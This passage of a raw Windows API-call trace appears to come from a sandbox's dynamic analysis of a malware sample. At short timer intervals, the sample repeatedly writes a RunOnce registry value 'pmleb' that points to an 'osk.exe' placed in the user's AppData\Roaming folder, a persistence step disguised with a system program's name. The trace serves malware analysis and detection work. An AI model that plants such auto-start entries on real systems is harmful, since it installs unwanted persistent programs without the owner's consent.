lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.409] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.409] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.409] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.409] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.409] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.410] RegCloseKey (hKey=0x280) returned 0x0 [0081.410] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.410] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.410] SetTimer (hWnd=0x20280, nIDEvent=0x20b0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b0 [0081.410] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.422] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.422] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.422] KillTimer (hWnd=0x20280, uIDEvent=0x20b0) returned 1 [0081.422] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.422] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.423] IUnknown:Release (This=0x787518) returned 0x1 [0081.423] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.423] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.423] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.423] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.423] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.423] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.423] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.423] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.423] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.423] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x35 [0081.423] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.423] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x36 [0081.423] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.424] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x35 [0081.424] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.424] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.424] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.424] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.424] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.425] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.425] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.425] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.425] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.425] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.425] RegCloseKey (hKey=0x280) returned 0x0 [0081.425] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.425] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.425] SetTimer (hWnd=0x20280, nIDEvent=0x20b1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b1 [0081.426] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.437] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.438] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.438] KillTimer (hWnd=0x20280, uIDEvent=0x20b1) returned 1 [0081.438] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.438] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.438] IUnknown:Release (This=0x787518) returned 0x1 [0081.438] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.438] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.438] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.439] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.439] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x36 [0081.439] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.439] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x37 [0081.439] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.440] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x36 [0081.440] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.440] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.440] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.440] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.440] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.440] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.440] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0081.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.441] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.441] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.441] RegCloseKey (hKey=0x280) returned 0x0 [0081.441] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.441] SetTimer (hWnd=0x20280, nIDEvent=0x20b2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20b2 [0081.441] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.453] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.453] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.453] KillTimer (hWnd=0x20280, uIDEvent=0x20b2) returned 1 [0081.454] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.454] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.454] IUnknown:Release (This=0x787518) returned 0x1 [0081.454] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0081.454] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.454] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.454] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.454] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.454] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.454] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.454] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.454] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.455] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x37 [0081.455] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.455] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x38 [0081.455] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
